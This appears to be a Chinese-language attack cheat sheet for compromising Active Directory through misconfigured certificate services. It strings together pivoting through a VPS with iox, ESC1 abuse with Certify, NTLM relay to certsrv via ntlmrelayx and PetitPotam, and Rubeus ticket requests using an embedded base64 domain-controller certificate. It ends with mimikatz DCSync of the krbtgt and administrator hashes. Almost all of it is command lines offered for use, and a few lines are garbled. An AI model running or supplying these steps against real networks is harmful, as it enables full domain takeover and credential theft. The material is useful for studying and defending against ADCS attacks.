ADCS证书服务打法
探测域内证书服务
判断是否存在域和adcs证书
ipconfig /all #查看ip配置详细信息
目标机器1.1.1.1 --》vps1.1.1.2———》win
ping 192.168.1.1 不出网 --》1.1.1.1
iox proxy -r 1.1.1.2:1234
iox proxy -l 1234 -l 1081
proxychains4 1.1.1.2:1081
msf会。x x
certutil -CA #显示注册策略CA
certutil -config - -ping #这个命令因为会弹窗,所以一般不使用
证书模版配置错误
枚举证书漏洞
execute-assembly /root/桌面/tools/Certify.exe find /vulnerable
execute-assembly /root/桌面/tools/Certify.exe request /ca:adcs.attack.com\attack-ADCS-CA /template:ATTACK /altname:attackadmin
pem转换pfx证书
#通过openssl转换证书
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
#将pfx证书转换为base64
cat cert.pfx | base64 -w 0
申请TGT票据
execute-assembly /root/桌面/tools/Rubeus.exe asktgt /user:attackadmin /certificate:base64 /aes256 /nowrap
NTLM Relay攻击
curl http://192.168.3.3/certsrv/ -I
http://192.168.3.3/certsrv/certfnsh.asp
ntlmrelayx监听获取TGT
python3 ntlmrelayx.py -t http://192.168.3.3/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'
python3 PetitPotam.py 192.168.3.131 192.168.3.2
Rubeus 导入证书数据
Rubeus.exe asktgt /user:dc$ /certificate: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 /ptt
mimikatz.exe
kerberos::list #查看kerberos票据
kerberos::purge #清空以前的票据
kerberos::ptt ticket.kirbi #导入票据
lsadump::dcsync /user:krbtgt /csv #导出krbtgt用户的hash
lsadump::dcsync /user:administrator /csv #导出administrator用户的hash
